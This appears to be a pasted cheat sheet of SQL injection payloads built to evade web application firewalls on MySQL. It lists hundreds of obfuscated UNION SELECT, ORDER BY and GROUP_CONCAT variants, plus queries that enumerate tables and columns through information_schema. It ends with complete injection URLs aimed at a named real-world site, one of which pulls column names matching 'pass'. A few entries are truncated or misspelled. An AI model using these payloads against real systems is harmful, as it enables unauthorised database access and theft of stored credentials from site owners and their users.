
waf bypass sqli

a guest
Mar 25th, 2020
  1. WAF Bypass Cheat Sheet - 2016
  2.  
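  3. Union Select (the /*!NNNNN ... */ entries are MySQL version-conditional comments: the server executes their contents, so a filter has to inspect them as SQL rather than skip them as comments)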
  4. +union+distinct+select+
  5. +union+distinctROW+select+
  6. /**//*!12345UNION SELECT*//**/
  7. /**//*!50000UNION SELECT*//**/
  8. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  9. +/*!u%6eion*/+/*!se%6cect*/+
  10. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  11. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  12. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  13. union /*!50000%53elect*/
  14. %55nion %53elect
  15. +--+Union+--+Select+--+
  16. +UnIoN/*&a=*/SeLeCT/*&a=*/
  17. id=1+?UnI?On?+'SeL?ECT?
  18. id=1+'UnI'||'on'+SeLeCT'
  19. UnIoN SeLeCt CoNcAt(version())--
  20. uNiOn aLl sElEcT
  21. uUNIONnion all sSELECTelect
  22. /*union*/union/*select*/select+1,2,3/*
  23. /*uniXon*/union/*selXect*/select+1,2/*
  24. un/**/ion+sel/**/ect
  25. +#1q%0Aunion all#qa%0A#%0Aselect
  26. union /*!select*/+
  27. union/**/select/**/
  28. /**/union/**/select/**/
  29. /**/union/*!50000select*/
  30. /**//*!12345UNION SELECT*//**/
  31. /**//*!50000UNION SELECT*//**/
  32. /**/uniUNIONon/**/selSELECTect/**/
  33. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  34. /**//*!union*//**//*!select*//**/
  35. /**/UNunionION/**/SELselectECT/**/
  36. /**//*UnIOn*//**//*SEleCt*//**/
  37. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  38. /**/UNunionION/**/all/**/SELselectECT/**/
  39. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  40. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  41. uni
  42. %20union%20/*!select*/%20
  43. union%23aa%0Aselect
  44. union+distinct+select+
  45. union+distinctROW+select+
  46. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  47. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  48. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  49. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  50. /*!u%6eion*/+/*!se%6cect*/+
  51. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  52. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  53. union /*!50000%53elect*/
  54. +%2F**/+Union/*!select*/
  55. %55nion %53elect
  56. +?+Union+?+Select+?+
  57. +UnIoN/*&a=*/SeLeCT/*&a=*/
  58. uNiOn aLl sElEcT
  59. uUNIONnion all sSELECTelect
  60. union(select(1),2,3)
  61. union (select 1111,2222,3333)
  62. union (/*!/**/ SeleCT */ 11)
  63. %0A%09UNION%0CSELECT%10NULL%
  64. /*!union*//*?*//*!all*//*?*//*!select*/
  65. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  66. union+sel%0bect
  67. +uni*on+sel*ect+
  68. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  69. union(select (1),(2),(3),(4),(5))
  70. UNION(SELECT(column)FROM(table))
  71. id=1+?UnI?On?+?SeL?ECT?
  72. id=1+?UnI?||?on?+SeLeCT?
  73. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  74. /*!00000Union*/ /*!00000Select*/
  75. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  76. %55nion %53elect
  77. %55nion(%53elect 1,2,3)-- -
  78. +union+distinct+select+
  79. +union+distinctROW+select+
  80. /**//*!12345UNION SELECT*//**/
  81. /**//*!50000UNION SELECT*//**/
  82. /**/UNION/**//*!50000SELECT*//**/
  83. /*!50000UniON SeLeCt*/
  84. union /*!50000%53elect*/
  85. + #?uNiOn + #?sEleCt
  86. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  87. /*!%55NiOn*/ /*!%53eLEct*/
  88. /*!u%6eion*/ /*!se%6cect*/
  89. +un/**/ion+se/**/lect
  90. uni%0bon+se%0blect
  91. %2f**%2funion%2f**%2fselect
  92. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  93. REVERSE(noinu)+REVERSE(tceles)
  94. /*--*/union/*--*/select/*--*/
  95. union (/*!/**/ SeleCT */ 1,2,3)
  96. /*!union*/+/*!select*/
  97. union+/*!select*/
  98. /**/union/**/select/**/
  99. /**/uNIon/**/sEleCt/**/
  100. +%2F**/+Union/*!select*/
  101. /**//*!union*//**//*!select*//**/
  102. /*!uNIOn*/ /*!SelECt*/
  103. +union+distinct+select+
  104. +union+distinctROW+select+
  105. uNiOn aLl sElEcT
  106. UNIunionON+SELselectECT
  107. /**/union/*!50000select*//**/
  108. 0%a0union%a0select%09
  109. %0Aunion%0Aselect%0A
  110. %55nion/**/%53elect
  111. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  112. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  113. %0A%09UNION%0CSELECT%10NULL%
  114. /*!union*//*--*//*!all*//*--*//*!select*/
  115. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  116. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  117. +UnIoN/*&a=*/SeLeCT/*&a=*/
  118. union+sel%0bect
  119. +uni*on+sel*ect+
  120. +#1q%0Aunion all#qa%0A#%0Aselect
  121. union(select (1),(2),(3),(4),(5))
  122. UNION(SELECT(column)FROM(table))
  123. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  124. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  125. union(select(1),2,3)
  126. union (select 1111,2222,3333)
  127. uNioN (/*!/**/ SeleCT */ 11)
  128. union (select 1111,2222,3333)
  129. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  130. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  131. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  132. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  133. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  134. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  135. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  136. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  137. /union\sselect/g
  138. /union\s+select/i
  139. /*!UnIoN*/SeLeCT
  140. +UnIoN/*&a=*/SeLeCT/*&a=*/
  141. +uni>on+sel>ect+
  142. +(UnIoN)+(SelECT)+
  143. +(UnI)(oN)+(SeL)(EcT)
  144. +?UnI?On?+'SeL?ECT?
  145. +uni on+sel ect+
  146. +/*!UnIoN*/+/*!SeLeCt*/+
  147. /*!u%6eion*/ /*!se%6cect*/
  148. uni%20union%20/*!select*/%20
  149. union%23aa%0Aselect
  150. /**/union/*!50000select*/
  151. /^.*union.*$/ /^.*select.*$/
  152. /*union*/union/*select*/select+
  153. /*uni X on*/union/*sel X ect*/
  154. +un/**/ion+sel/**/ect+
  155. +UnIOn%0d%0aSeleCt%0d%0a
  156. UNION/*&test=1*/SELECT/*&pwn=2*/
  157. un?+un/**/ion+se/**/lect+
  158. +UNunionION+SEselectLECT+
  159. +uni%0bon+se%0blect+
  160. %252f%252a*/union%252f%252a /select%252f%252a*/
  161. /%2A%2A/union/%2A%2A/select/%2A%2A/
  162. %2f**%2funion%2f**%2fselect%2f**%2f
  163. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  164. /*!UnIoN*/SeLecT+
  165. Union Select bypass using URL encoding:
  166. %55nion(%53elect)
  167. union%20distinct%20select
  168. union%20%64istinctRO%57%20select
  169. union%2053elect
  170. %23?%0auion%20?%23?%0aselect
  171. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  172. %55nion %53eLEct
  173. u%6eion se%6cect
  174. unio%6e %73elect
  175. unio%6e%20%64istinc%74%20%73elect
  176. uni%6fn distinct%52OW s%65lect
  177. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  178.  
  179. Cheat sheet for bypassing filters on ORDER BY and GROUP BY
  180.  
  181.  
  182. order by/**_**/
  183. /*!12345order*/ /*!12345by*/
  184. ) order by 1-- -
  185. ') order by 1-- -
  186.  
  187. ')order by 1%23%23
  188.  
  189. %')order by 1%23%23
  190.  
  191. Null' order by 100--+
  192.  
  193. Null' order by 9999--+
  194.  
  195. ')group by 99-- -
  196.  
  197. 'group by 119449-- -
  198.  
  199. 'group/**/by/**/99%23%23
  200.  
  201.  
  202.  
  203.  
  204. CONCAT and GROUP_CONCAT bypass cheat sheet:
  205.  
  206.  
  207.  
  208. /*!12345group_concat*/(/*!12345table_name*/)
  209. /*!50000group_concat*/(/*!50000table_name*/)
  210. /*!GrOuP_ConCaT*/()
  211. /*!12345GroUP_ConCat*/()
  212. /*!50000gRouP_cOnCaT*/()
  213. /*!50000Gr%6fuP_c%6fnCAT*/()
  214. /*!group_concat*/()
  215. gRoUp_cOnCAt()
  216. group_concat(/*!*/)
  217. group_concat(/*!12345table_name*/)
  218. group_concat(/*!50000table_name*/)
  219. /*!group_concat*/(/*!12345table_name*/)
  220. /*!group_concat*/(/*!50000table_name*/)
  221. unhex(hex(group_concat(table_name)))
  222. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  223. unhex(hex(/*!12345group_concat*/(table_name)))
  224. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  225. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  226. unhex(hex(/*!50000group_concat*/(table_name)))
  227. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  228. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  229. CONVERT(group_concat(table_name)+USING+latin1)
  230. CONVERT(group_concat(table_name)+USING+latin2)
  231. CONVERT(group_concat(table_name)+USING+latin3)
  232. CONVERT(group_concat(table_name)+USING+latin4)
  233. CONVERT(group_concat(table_name)+USING+latin5)
  234. convert(group_concat(table_name)+using+ascii)
  235. convert(group_concat(/*!table_name*/)+using+ascii)
  236. convert(group_concat(/*!12345table_name*/)+using+ascii)
  237. convert(group_concat(/*!50000table_name*/)+using+ascii)
  238. /*!concat_ws(0x3a,)*/
  239. concat_ws(0x3a3a3a,version()
  240. CONCAT_WS(CHAR(32,58,32),version(),)
  241.  
  242. How to bypass filtering when listing tables:
  243. group_concat(/*!table_name*/)
  244.  
  245. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -
  246.  
  247. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
  248. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
  249. How to bypass filtering when listing columns:
  250. group_concat(/*!column_name*/)
  251. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  252. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -
  253.  
  254.  
  255. URL-encoded bypass for tables and columns:
  256. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  257. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  258. For example:
  259. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?
  260.  
  261. "Illegal mix of collations" error bypass:
  262.  
  263. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  264. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  265.  
  266. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?